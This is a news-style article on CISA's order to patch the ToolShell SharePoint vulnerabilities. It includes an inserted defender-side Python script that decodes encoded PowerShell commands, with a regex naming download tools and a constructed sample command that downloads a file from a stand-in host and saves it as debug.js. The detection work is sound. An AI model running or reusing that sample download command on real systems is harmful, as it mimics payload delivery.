CISA Urges Immediate Patching as Chinese Hackers Exploit Microsoft SharePoint Vulnerabilities

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent directive for federal agencies to address critical vulnerabilities in Microsoft SharePoint, following active exploitation by Chinese state-sponsored hacking groups. On July 22, 2025, CISA added two specific flaws—CVE-2025-49704 and CVE-2025-49706—to its Known Exploited Vulnerabilities (KEV) catalog, mandating remediation by July 23, 2025.

These vulnerabilities, collectively referred to as ToolShell, consist of a spoofing flaw (CVE-2025-49706) and a remote code execution (RCE) flaw (CVE-2025-49704). Exploitation of these flaws enables unauthorized access to on-premises SharePoint servers, allowing attackers to execute arbitrary code and potentially gain full control over affected systems. Microsoft has identified that Chinese hacking groups, including Linen Typhoon and Violet Typhoon, have been leveraging these vulnerabilities since July 7, 2025.

The attack chain typically involves exploiting these SharePoint flaws to deploy a web shell, which facilitates the retrieval and theft of MachineKey data. This data can then be used to impersonate users and escalate privileges within the network. Symantec has observed post-exploitation activities where attackers execute encoded PowerShell commands to download malicious executables disguised as benign files, such as debug.js, to evade detection.
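A defender-side triage sketch for the post-exploitation behaviour described above, added here as an example and not taken from CISA, Microsoft or Symantec. It decodes PowerShell -EncodedCommand arguments found in process command lines, flags decoded scripts that download content, and checks whether a file with a harmless-looking name such as debug.js actually starts with the PE "MZ" header. The sample command lines, the host name and the extension list are constructed assumptions.

```python
import base64
import re

# Cmdlets, aliases and methods commonly used to fetch remote content.
DOWNLOAD = re.compile(r"(?i)\b(invoke-webrequest|iwr|downloadfile|downloadstring|start-bitstransfer|curl|wget)\b")
BENIGN_EXT = (".js", ".css", ".txt", ".png", ".jpg")  # assumed "harmless looking" extensions

def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline runs PowerShell with -EncodedCommand, else None."""
    if not re.search(r"(?i)\b(powershell|pwsh)\b", cmdline):
        return None
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        name = flag[1:].lower()
        # Accept any prefix of -EncodedCommand (-e, -en, -enc, ...) and the -ec alias.
        if flag[0] in "-/" and name and ("encodedcommand".startswith(name) or name == "ec"):
            try:
                # -EncodedCommand carries base64 over a UTF-16LE string.
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except ValueError:  # malformed base64 or not valid UTF-16LE
                return None
    return None

def is_disguised_pe(filename, head):
    """True if a file with a harmless-looking extension starts with the PE 'MZ' magic."""
    return filename.lower().endswith(BENIGN_EXT) and head[:2] == b"MZ"

def triage(cmdlines):
    """Return (index, decoded_script) for encoded commands whose script downloads content."""
    hits = []
    for i, line in enumerate(cmdlines):
        script = decode_encoded_command(line)
        if script and DOWNLOAD.search(script):
            hits.append((i, script))
    return hits

def _enc(script):  # only used to build the constructed samples below
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample command lines (not from any real incident).
SAMPLES = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    "powershell.exe -nop -w hidden -enc " + _enc("Invoke-WebRequest -Uri http://files.example.invalid/a -OutFile C:\\Users\\Public\\debug.js"),
    "powershell.exe -EncodedCommand " + _enc("Get-Date"),
    "powershell.exe -e not*base64",
]

if __name__ == "__main__":
    for index, script in triage(SAMPLES):
        print(f"suspicious encoded download in sample {index}: {script}")
```

In practice the command lines would come from process-creation logging on the SharePoint server, and the first bytes passed to is_disguised_pe from files written under web-accessible or temporary directories.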

In response to these threats, Microsoft has released security updates that address the vulnerabilities, and administrators are strongly advised to apply them immediately to mitigate the risk of exploitation. Enabling the Antimalware Scan Interface (AMSI) is also recommended as a mitigation step to prevent unauthenticated attacks. However, security researchers have noted that AMSI is not a comprehensive solution, and organizations should not rely on it alone for protection.

The urgency of this situation underscores the critical need for organizations to maintain up-to-date security measures and promptly apply patches to known vulnerabilities. Failure to do so can result in significant security breaches, data theft, and potential operational disruptions.